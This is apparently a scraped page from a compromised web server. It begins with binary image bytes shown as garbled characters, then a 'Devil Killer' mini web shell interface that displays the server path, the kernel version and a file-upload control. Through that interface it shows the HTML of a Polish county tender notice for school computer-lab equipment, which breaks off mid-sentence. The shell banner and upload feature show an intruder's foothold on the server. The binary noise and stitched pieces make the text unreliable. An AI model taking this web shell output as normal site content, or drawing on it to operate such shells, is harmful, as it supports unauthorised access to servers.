JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230116/0003436701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa sprzętu i wyposażenia do pracowni informatyczno-językowej w ramach projektu „Wyposażenie pracowni i sal dydaktycznych szkół ogólnokształcących podlegających Powiatowi Lidzbarskiemu” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIAT LIDZBARSKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 510742528</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kardynała Stefana Wyszyńskiego 37</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lidzbark Warmiński</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">11-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">897677900</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">897677903</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@powiatlidzbarski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bipsplidzbark.warmia.mazury.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa sprzętu i wyposażenia do pracowni informatyczno-językowej w ramach projektu „Wyposażenie pracowni i sal dydaktycznych szkół ogólnokształcących podlegających Powiatowi Lidzbarskiemu” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d724771e-958a-11ed-b4ea-f64d350121d2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00034367</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-01-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00331451/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.5 Dostawa sprzętu i wyposażenia do pracowni informatyczno-językowej w ramach projektu „Wyposażenie pracowni i sal dydaktycznych szkół ogólnokształcących podlegających Powiatowi Lidzbarskiemu”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Warmińsko-Mazurskiego na lata 2014-2020 Oś Priorytetowa 9 Dostęp do wysokiej jakości usług publicznych: Działanie 9.3 Infrastruktura edukacyjna Poddziałanie 9.3.4 Infrastruktura edukacji ogólnokształcącej. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowieniapubliczne.powiatlidzbarski.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja, w tym składanie ofert, wymiana informacji oraz przekazywanie<br/>dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w Ustawie, odbywa się<br/>przy użyciu środków komunikacji elektronicznej za pośrednictwem platformy zakupowej dostępnej pod adresem:<br/>https://zamowieniapubliczne.powiatlidzbarski.pl. Przez środki komunikacji elektronicznej rozumie się środki komunikacji<br/>elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2019 r. poz. 123 i<br/>730).<br/>2. Komunikacja ustna dopuszczalna jest w odniesieniu do informacji, które nie są istotne, w szczególności nie dotyczą ogłoszenia o<br/>zamówieniu lub SWZ, a także ofert.<br/>3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wszelka korespondencja będzie prowadzona<br/>przez Zamawiającego wyłącznie z ich pełnomocnikiem.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1 Dotyczy komunikacji za<br/>pośrednictwem platformy zakupowej:<br/>1.1. Zamawiający informuje, że instrukcje korzystania z platformy zakupowej dotyczące w szczególności logowania, składania pytań<br/>o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformy<br/>zakupowej znajdują się w zakładce „Dokumentacja” zamieszczonych na platformie zakupowej dostępnej pod adresem<br/>https://zamowieniapubliczne.powiatlidzbarski.pl<br/>1.2. W celu skrócenia czasu udzielenia odpowiedzi na pytania, komunikacja między Zamawiającym a wykonawcami, prowadzona<br/>jest w formie elektronicznej za pośrednictwem platformy zakupowej i zakładki „Pytania i odpowiedzi”.<br/>1.3. Za datę przekazania (wpływu) pytań przyjmuje się datę ich przesłania za pośrednictwem platformy zakupowej.<br/>1.4. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest dany Wykonawca, będzie przekazywana w formie<br/>elektronicznej za pośrednictwem platformy zakupowej, do danego Wykonawcy i zakładki „Korespondencja”<br/>2. Rekomendacje Zamawiającego<br/>2.1. Zamawiający rekomenduje wykorzystanie formatów: .pdf, .doc, .docx, .xls, xlsx ze szczególnym wskazaniem na .pdf<br/>2.2. W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip.<br/>2.3. Wśród formatów powszechnych a NIE występujących w Rozporządzeniu z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram<br/>Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych<br/>wymagań dla systemów teleinformatycznych (Dz.U. 2017 poz. 2247) występują: .rar .gif .bmp .numbers .pages. Dokumenty złożone<br/>w takich plikach zostaną uznane za złożone nieskutecznie.<br/>2.4. Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB.<br/>2.5. Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, zamawiający zaleca, w miarę<br/>możliwości, przekonwertowanie plików składających się na ofertę (dotyczy plików w formacie .doc, .docx) na format .pdf i opatrzenie<br/>ich podpisem kwalifikowanym PAdES.<br/>2.6. Pliki w innych formatach niż PDF należy opatrzyć wewnętrznym podpisem XAdES. tzn. plik podpisu będzie również zawierał<br/>treść dokumentu podpisywanego.<br/>W przypadku podpisania dokumentu podpisem zewnętrznym XAdES tzn. plik podpisu nie zawiera treści dokumentu podpisywanego.<br/>Wykonawca powinien pamiętać, aby plik z podpisem przekazywać łącznie z dokumentem podpisywanym (plikiem, który został<br/>podpisany).<br/>2.7. Zamawiający zaleca aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju.<br/>Podpisywanie różnymi rodzajami podpisów np. osobistym i kwalifikowanym może doprowadzić do problemów w weryfikacji plików.<br/>2.8. Zamawiający zaleca, aby Wykonawca z odpowiednim wyprzedzeniem przetestował możliwość prawidłowego wykorzystania<br/>wybranej metody podpisania plików oferty.<br/>2.9. Zaleca się, aby komunikacja z Wykonawcami odbywała się tylko na Platformie zakupowej a nie za pośrednictwem adresu email.<br/>2.10. Osobą składającą ofertę powinna być osoba kontaktowa podawana w dokumentacji.<br/>2.11. Ofertę należy przygotować z należytą starannością dla podmiotu ubiegającego się o udzielenie zamówienia publicznego i<br/>zachowaniem odpowiedniego odstępu czasu do zakończenia przyjmowania ofert/wniosków. Sugerujemy złożenie oferty na 24<br/>godziny przed terminem składania ofert/wniosków.<br/>2.12. Jeśli wykonawca pakuje dokumenty np. w plik ZIP wymaga się wcześniejsze podpisanie każdego ze skompresowanych plików.<br/>2.13. Zamawiający rekomenduje wykorzystanie podpisu z kwalifikowanym znacznikiem czasu.<br/>2.14. Zamawiający zaleca aby nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich podpisem kwalifikowanym. Może to<br/>skutkować naruszeniem integralności plików co równoważne będzie z koniecznością odrzucenia oferty w postępowaniu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>􀀀 Administratorem danych osobowych jest Starosta Lidzbarski z siedzibą przy ul. Wyszyńskiego 37 , 11-100 Lidzbark Warmiński, tel.<br/>089 767 7900, www.powiatlidzbarski.pl<br/>􀀀 Dane kontaktowe inspektora ochrony danych ul. Wyszyńskiego 37 , 11-100 Lidzbark Warmiński, e-mail: iod@powiatlidzbarski.pl<br/>􀀀 Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego nr PŚZ.272.2.2023, w związku z wymogami, jakie na zamawiającego nakładają przepisy<br/>ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych (Dz.U. z 2019 r. poz. 2019 z późn. zm.), zwanej dalej Ustawą.<br/>Odbiorcami Pani/Pana danych osobowych będzie - dane osobowe mogą być przekazywane osobom zainteresowanym w oparciu o<br/>art. 74 ustawy,<br/>􀀀 Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Ustawy, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia.<br/>􀀀 obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach Ustawy, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają<br/>z Ustawy;<br/>􀀀 posiada Pani/Pan:<br/>− prawo dostępu do danych osobowych, które Pani/Pana dotyczą, przy czym informujemy, że gdyby spełnienie tego żądania<br/>wymagało niewspółmiernie dużo wysiłku, Administrator ma prawo do zażądania od Pani/Pana dodatkowych informacji dotyczących<br/>zgłaszanego żądania takich jak szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub<br/>konkursu stosownie do treści przepisu art. 8a ust. 2 Ustawy,<br/>− prawo do sprostowania Pani/Pana danych osobowych,<br/>− prawo żądania od Administratora ograniczenia przetwarzania danych osobowych oraz prawo do żądania usunięcia danych<br/>osobowych<br/>w przypadku gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO, ma<br/>Pani/Pan prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PŚZ.272.2.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest dostawa sprzętu i wyposażenia do pracowni informatyczno-językowej w Zespole Szkół Ogólnokształcących w Lidzbarku Warmińskim i w Ornecie (zwanym dalej sprzęt). Zakres zamówienia obejmuje również montaż, instalację, konfigurację i szkolenie z obsługi oraz dostosowanie infrastruktury sieciowej i zasilającej wraz z elementami takimi jak przewody, kołki montażowe, korytka kablowe.<br/>2. Szczegółowy opis przedmiotu zamówienia (OPZ) określony został w Zał. Nr 1 do swz. Przedmiot zamówienia obejmuje:<br/>a) Wyposażenie dla ZSO w Lidzbarku Warmińskim:<br/>Pracownia informatyczno-językowa<br/>1) Pracownia informatyczno-językowa (16 stanowisk uczniowskich + 1 nauczyciel) - 1 zestaw<br/>2) Urządzenie wielofunkcyjne – 1 szt.<br/>3) Rolety zaciemniające – 6 szt.<br/>4) Drukarka 3D z filamentem – 1 szt.<br/>5) Kamera sportowa – 1 szt.<br/>6) Zestaw do bezprzewodowej transmisji dźwięku – 1 szt.<br/>b) Wyposażenie dla ZSO w Ornecie<br/>Pracownia informatyczno-językowa<br/>1) Pracownia informatyczno-językowa (16 stanowisk uczniowskich + 1 nauczyciel) - 1 zestaw<br/>2) Urządzenie wielofunkcyjne – 1 szt.<br/>3) Rolety zaciemniające – 3 szt.<br/>4) Drukarka 3D z filamentem – 1 szt.<br/>5) Kamera sportowa – 1 szt.<br/>6) Zestaw do bezprzewodowej transmisji dźwięku – 1 szt.<br/>3. Oferowany sprzęt musi być fabrycznie nowy, nieużywany oraz nieeksponowany na wystawach lub imprezach targowych,<br/>sprawny technicznie, bezpieczny, kompletny i gotowy do pracy, pochodzić z bieżącej produkcji, posiadać stosowne<br/>certyfikaty i aprobaty dopuszczające sprzęt do sprzedaży i użytkowania na terenie RP. Wskazane wyżej dokumenty należy<br/>dołączyć na wezwanie Zamawiającego.<br/>4. Zamawiający wymaga aby Wykonawca przedłożył wraz z ofertą specyfikacje wraz z opisem oferowanych produktów.<br/>Specyfikacja powinna zawierać co najmniej: markę, model, kod produktu producenta, opis produktu, zestawienie<br/>parametrów.<br/>5. Wykonawca dostarcza zamówiony towar swoim transportem (wliczonym w cenę) do siedziby wskazanej w SWZ w<br/>terminie wskazanym w formularzu oferty.<br/>6. Na etapie przygotowania ofert Wykonawca zobowiązany jest przeanalizować wszystkie elementy opisu technicznego i w<br/>razie wątpliwości zgłosić pisemnie w przewidzianym terminie uwagi i zauważone nieścisłości. Zamawiający w<br/>przewidzianym terminie odpowie pisemnie na wszelkie pytania.<br/>7. Jeżeli gdziekolwiek w dokumentacji użyto nazw marek (firm), wyrobów czy technologii, należy to traktować jako<br/>informację na temat oczekiwanego standardu i poziomu jakości, a nie ściśle jako określenie wyrobu koniecznego do użycia.<br/>Wszelkie „produkty” pochodzące od konkretnych producentów, określają minimalne parametry jakościowe i cechy użytkowe,<br/>jakim muszą odpowiadać towary, aby spełnić wymagania stawiane przez Zamawiającego i stanowią wyłącznie wzorzec<br/>jakościowy przedmiotu zamówienia. Poprzez zapis dot. minimalnych wymagań parametrów jakościowych, Zamawiający<br/>rozumie wymagania towarów zawarte w ogólnie dostępnych źródłach, katalogach, stronach internetowych producentów.<br/>Operowanie przykładowymi nazwami producenta, ma jedynie na celu doprecyzowanie poziomu oczekiwań Zamawiającego<br/>w stosunku do określonego rozwiązania. Tak więc posługiwanie się nazwami producentów, „produktów” ma wyłącznie<br/>charakter przykładowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30200000-1 - Urządzenia komputerowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">48900000-7 - Różne pakiety oprogramowania i systemy komputerowe</p> <p class="mb-0">30213100-6 - Komputery przenośne</p> <p class="mb-0">30213000-5 - Komputery osobiste</p> <p class="mb-0">30231300-0 - Monitory ekranowe</p> <p class="mb-0">30121200-5 - Urządzenia fotokopiujące</p> <p class="mb-0">30232100-5 - Drukarki i plotery</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wskazuje na dwa kryteria oceny ofert:<br/>1) CENA – „C” , waga kryterium 60%<br/>a) Ceną oferty jest kwota wymieniona w formularzu ofertowym.<br/>b) Punkty dla danej oferty obliczane będą wg wzoru :<br/>najniższa cena brutto z badanych ofert<br/>C = ---------------------------------------------------------- x 60 pkt<br/>cena brutto oferty badanej<br/>Maksymalna ilość punktów, jaką Zamawiający może przyznać w tym kryterium to 60 pkt.<br/>2) TERMIN GWARANCJI – T, waga kryterium 40%<br/>Punkty dla tego kryterium będą liczone w następujący sposób:<br/>a) Termin udzielonej gwarancji zostanie określony w formularzu ofertowym.<br/>b) Minimalny termin udzielonej gwarancji wynosi 36miesięcy<br/>c) Punkty dla tego kryterium będą w następujący sposób:<br/>36 miesięcy – 0 punktów<br/>48 miesiące – 2 punkty<br/>60 miesięcy – 4 punkty<br/>liczba punktów za termin udzielonej gwarancji<br/>T = ------------------------------------------------------------------------------------------------- x 40 pkt<br/>maksymalna możliwa do uzyskania liczba punktów<br/>20.2. Maksymalna ilość punktów, jaką Zamawiający może przyznać w tym kryterium to 40 pkt. Minimalny okres gwarancji<br/>przedmiotu zamówienia wynosi 36 m-cy. Oferty z zaproponowanym krótszym okresem gwarancji niż przyjęty przez Zamawiającego,<br/>zostaną odrzucone, jako nieodpowiadające treści SWZ. Oferta Wykonawcy, który nie określi w złożonej ofercie okresu gwarancji<br/>potraktowana zostanie jak oferta z gwarancją 36-miesięczną.<br/>Oferta, która uzyska najwyższą ilość punktów (x) sumarycznie w obydwóch kryteriach obliczonych na podstawie w/w sposobów,<br/>zostanie uznana przez Zamawiającego za najkorzystniejszą.<br/>X= T+C<br/>20.3. Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku.<br/>Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>20.4. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim wymaganiom przedstawionym w<br/>ustawie, oraz w SWZ i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria wyboru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">9.1. Do oferty Wykonawca<br/>dołącza oświadczenie o niepodleganiu wykluczeniu z postępowania. Niniejsze oświadczenie, stanowi dowód potwierdzający brak<br/>podstaw wykluczenia, na dzień składania ofert. Wzór oświadczenia stanowi Załącznik nr 3 do SWZ.<br/>Wykonawca, który zamierza powierzyć wykonanie części zamówienia podwykonawcom, w celu wykazania braku istnienia wobec<br/>nich podstaw wykluczenia z udziału w postępowaniu zamieszcza informacje o podwykonawcach w ww. oświadczeniu</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o<br/>których mowa w pkt 